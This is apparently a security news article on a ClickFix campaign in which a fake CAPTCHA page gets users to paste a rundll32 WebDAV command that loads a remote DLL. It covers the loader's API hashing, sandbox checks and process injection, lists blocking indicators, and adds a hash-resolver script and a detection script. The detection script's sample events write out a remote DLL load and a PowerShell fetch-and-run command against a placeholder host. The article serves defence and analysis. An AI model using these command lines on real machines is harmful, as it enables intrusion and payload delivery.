ClickFix Malware Uses Rundll32, WebDAV to Evade PowerShell Detection
Key Takeaways
- A new, more sophisticated variant of the ClickFix attack is actively targeting Windows users.
- This iteration leverages native Windows components, specifically rundll32.exe and WebDAV, to bypass traditional PowerShell-focused security detections.
- The attack chain employs advanced evasion techniques, including in-memory execution, API hashing, and sandbox/debugger detection, making it harder to analyze and detect.
- Initial access relies on social engineering via a fake CAPTCHA website instructing users to manually execute a malicious command.
- Defenders must broaden their monitoring to include native Windows binaries and implement robust user awareness training to counter this evolving threat.
ClickFix Malware Evades Detection with Rundll32 and WebDAV
A significantly evolved form of the ClickFix attack technique is now actively compromising Windows users, moving away from its predecessors’ reliance on PowerShell or mshta for command execution. This latest variant strategically employs rundll32.exe and WebDAV, two legitimate, built-in Windows functionalities, to silently deliver and execute malicious payloads, thereby circumventing many common security alerts.
This tactical shift presents a considerable challenge for cybersecurity defenses, particularly for organizations whose detection mechanisms are primarily configured to identify script-based threats. ClickFix attacks are notorious for manipulating users into inadvertently executing harmful commands on their own systems.
Social Engineering at the Core
The current campaign begins with a deceptive website disguised as a CAPTCHA verification page, identified as “healthybyhillary[.]com.” The page instructs visitors to press Win + R to open the Windows Run dialog, paste with Ctrl + V a command that the page has already placed on the clipboard, and then press Enter to run it. Because the user types the keystrokes and the command runs under their own account, no exploit is needed; the technique works because most users do not recognise a Run-dialog paste as an attack vector.

Analysts at CyberProof identified this new ClickFix variant during ongoing threat monitoring. Their findings highlight its reduced dependence on commonly scrutinized scripting engines. Instead of an initial direct call to PowerShell, the attack leverages rundll32.exe in conjunction with the WebDAV mini-redirector. This allows Windows to access remote files over HTTP, treating them as if they reside on a local network share.
Consequently, the malicious DLL is retrieved from an attacker-controlled server using a command structure such as rundll32.exe [email protected],#1. The WebDAV mini-redirector accepts UNC paths of the form \\host@80\share\file.dll (or \\host@SSL@443\... for HTTPS) and fetches the file over HTTP, so rundll32.exe loads a remote DLL exactly as it would a local one. The #1 component selects the export to call by ordinal number rather than by a human-readable name, so the command line reveals nothing about what the function does, adding a further layer of obfuscation.
The implications of this altered methodology are substantial. Security teams with detection rules predominantly focused on PowerShell, mshta, or similar scripting engines are likely to miss the initial stages of this attack. The malware’s activities blend into legitimate Windows operations, as rundll32.exe is a trusted, signed system utility frequently used by benign applications. This enables initial access and payload delivery with a minimal forensic footprint on disk: the one durable artifact is the WebClient service’s local cache under %SystemRoot%\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV, which retains a copy of files fetched over WebDAV and is worth collecting during triage.

Detection Evasion Through Native Windows Components and In-Memory Execution
What makes this ClickFix variant particularly formidable is its handling of the stages after initial execution. Once rundll32.exe has retrieved and loaded the remote DLL via WebDAV, the infection transitions into a multi-stage process that largely remains in memory. PowerShell is eventually invoked, but only at a later phase, using Invoke-Expression (IEX) together with Net.WebClient.DownloadString to fetch and execute subsequent payloads without writing them to disk. The switches -NoP (NoProfile) and -NonI (NonInteractive) are passed so that no profile script runs and no prompt is displayed, keeping the session free of visible side effects. These switches do not defeat PowerShell’s own telemetry: with script block logging enabled, the content passed to IEX is still recorded in event 4104, which is why this stage remains detectable even though the initial access is not.

The primary payload in this chain is a secondary loader dubbed SkimokKeep, delivered as a 32-bit Windows DLL named verification.google. This loader incorporates several advanced techniques to evade detection. Instead of standard Windows API function imports, it traverses the Process Environment Block (PEB) to locate loaded system modules and resolves functions using a DJB2-style hashing algorithm. This method conceals the specific system functions the malware utilizes, significantly complicating static analysis.
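The loader resolves APIs by walking the PEB and comparing hashes of export names against hardcoded values. An analyst reversing such a sample needs the inverse operation: a table of hashes for likely export names so the hardcoded constants can be turned back into API names. The following is an added example, not code from the article or from the SkimokKeep sample; it assumes the textbook DJB2 constants (seed 5381, multiplier 33), since the article only says "DJB2-style", and it also covers the common xor variant and case-normalised names in case the sample differs. The hash values it resolves are constructed by hashing known names, not extracted from the malware.

```python
"""Recover Windows API names from DJB2-style hashes (added example)."""
from typing import Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def djb2(name: str, seed: int = 5381, xor: bool = False) -> int:
    """Classic DJB2 over the ASCII bytes of `name`, truncated to 32 bits.

    seed=5381 and the *33 step are the textbook constants (an assumption;
    the article does not give the sample's exact constants). xor=True selects
    the widely used 'djb2a' variant, which mixes each byte with XOR instead
    of addition. Check both when the additive form yields no matches.
    """
    h = seed
    for b in name.encode("ascii"):
        h = (h * 33) & MASK32
        h = (h ^ b) if xor else ((h + b) & MASK32)
    return h


def build_table(names: Iterable[str], **kw) -> Dict[int, str]:
    """Map hash -> export name for every candidate.

    The exact, lower-case and upper-case forms are all hashed because some
    loaders normalise case before hashing (usually for module names such as
    KERNEL32.DLL, occasionally for exports too).
    """
    table: Dict[int, str] = {}
    for n in names:
        for form in (n, n.lower(), n.upper()):
            table[djb2(form, **kw)] = n
    return table


def resolve(hashes: Iterable[int], table: Dict[int, str]) -> Dict[int, Optional[str]]:
    """Look up each hardcoded hash; None marks a value not in the candidate set."""
    return {h: table.get(h) for h in hashes}


# Candidate exports an analyst would try first: the ones the article names
# (sandbox/debugger checks) plus the usual loader and injection primitives.
CANDIDATE_APIS = [
    "GetSystemMetrics", "GetForegroundWindow", "GetSystemTime", "GetTickCount",
    "GetCurrentProcessId", "VirtualAlloc", "VirtualProtect", "LoadLibraryA",
    "GetProcAddress", "WriteProcessMemory", "CreateRemoteThread", "CreateThread",
]

# Constructed "hardcoded constants": hashes of two known names plus one value
# that resolves to nothing, standing in for an export outside the candidate list.
CONSTRUCTED_HASHES = [djb2("VirtualAlloc"), djb2("GetTickCount"), 0xDEADBEEF]


def resolve_constructed() -> Dict[int, Optional[str]]:
    return resolve(CONSTRUCTED_HASHES, build_table(CANDIDATE_APIS))


if __name__ == "__main__":
    for h, name in resolve_constructed().items():
        print(f"0x{h:08X} -> {name or '<unresolved>'}")
```

In practice the candidate list is the full export table of kernel32.dll, ntdll.dll and user32.dll dumped from a clean system, and the table is rebuilt with `xor=True` or a different seed until the constants in the sample start resolving.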

Furthermore, the payload incorporates checks for sandbox and virtual machine environments using functions such as GetSystemMetrics, GetForegroundWindow, and GetSystemTime to detect atypical conditions often present in automated analysis systems. It also implements anti-debugging measures, including timing assessments with GetTickCount and process ID inspections, which can alter the malware’s behavior or halt its execution if it suspects it is being scrutinized.
Telemetry data further indicates that rundll32.exe injects code into legitimate running processes like chrome.exe and msedge.exe by modifying their memory space. This tactic helps the malware sustain access while maintaining stealth.

What You Should Do
- Monitor Rundll32.exe activity: Implement rigorous monitoring for all executions of rundll32.exe, particularly those whose command lines include davclnt.dll and DavSetCookie, as these are strong indicators of WebDAV-based payload delivery. Windows itself spawns rundll32.exe davclnt.dll,DavSetCookie whenever a WebDAV path is opened, so this indicator fires on the remote access regardless of how the attacker phrased the initial command.
- Enhance Command-Line Auditing: Enable and review command-line auditing for known Living Off the Land Binaries (LOLBins), including rundll32.exe, to identify and flag unusual usage patterns promptly.
- Restrict WebDAV Traffic: Limit or closely supervise outbound WebDAV traffic on port 80 (and on 443, which the mini-redirector uses for \\host@SSL@443 paths), especially in environments where it is not essential for operational needs. Where no business process depends on it, disabling the WebClient service removes the capability outright.
- Block Malicious Infrastructure: Configure firewalls and intrusion prevention systems to block connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains such as mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net.
- Improve User Awareness Training: Conduct regular and focused user awareness training sessions that specifically address fake CAPTCHA pages and ClickFix-style social engineering attacks. The success of these campaigns hinges entirely on users following deceptive on-screen instructions.
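The recommendations above translate into a handful of command-line rules. The following is an added example, not code from the article or from CyberProof: a small triage function run over constructed process-creation events in the shape of Sysmon event 1 fields (image, parent image, command line). The host 203.0.113.10 and the paths are documentation placeholders, not indicators from the campaign. It flags the three artifacts the article describes (a rundll32.exe UNC load in WebDAV syntax, an ordinal export, and the DavSetCookie invocation) plus the later PowerShell stage, and it treats explorer.exe as parent (the Run dialog) as corroboration rather than as a rule on its own, since explorer.exe launches plenty of legitimate rundll32.exe.

```python
"""Triage rundll32/PowerShell process events for ClickFix-style WebDAV loading (added example)."""
import re
from typing import Dict, List

# WebDAV mini-redirector UNC syntax: \\host@80\share or \\host@SSL@443\share
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(?:ssl@)?\d+\\", re.I)
# rundll32 export selected by ordinal, e.g. ",#1"
ORDINAL_EXPORT = re.compile(r",\s*#\d+\b")
# In-memory stager markers for the PowerShell stage
PS_IEX = re.compile(r"\b(iex|invoke-expression)\b")
PS_QUIET_FLAGS = {"-nop", "-noprofile", "-noni", "-noninteractive"}


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the rule names an event matches, in a fixed order."""
    image = ev["image"].lower()
    parent = ev["parent"].lower()
    cmd = ev["cmd"]
    low = cmd.lower()
    hits: List[str] = []
    if image.endswith("rundll32.exe"):
        remote = WEBDAV_UNC.search(cmd) is not None
        if remote:
            hits.append("rundll32_webdav_unc")
        if ORDINAL_EXPORT.search(cmd):
            hits.append("rundll32_ordinal_export")
        if "davclnt.dll" in low and "davsetcookie" in low:
            # Spawned by the WebClient service on any WebDAV access
            hits.append("webdav_client_access")
        if remote and parent.endswith("explorer.exe"):
            # Win+R paste: explorer.exe is the Run dialog's parent
            hits.append("run_dialog_remote_dll")
    if image.endswith("powershell.exe") or image.endswith("pwsh.exe"):
        quiet = bool(PS_QUIET_FLAGS & set(low.split()))
        if quiet and PS_IEX.search(low) and "downloadstring" in low:
            hits.append("powershell_in_memory_stager")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event id -> matched rules for every event that matched something."""
    return {ev["id"]: h for ev in events if (h := classify(ev))}


# Constructed events; not real telemetry. 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r"rundll32.exe \\203.0.113.10@80\dav\verification.google,#1"},
    {"id": 2, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmd": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
            r"203.0.113.10@80 http://203.0.113.10/dav/verification.google"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmd": "powershell.exe -NoP -NonI -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://203.0.113.10/stage2')\""},
    # Benign: Control Panel applet launched from the desktop, must not fire
    {"id": 4, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Event 2 is the one worth noting: it is generated by the WebClient service, not by the attacker's command, so the rule catches the remote access even when the initial rundll32.exe invocation is obfuscated or never logged.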
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.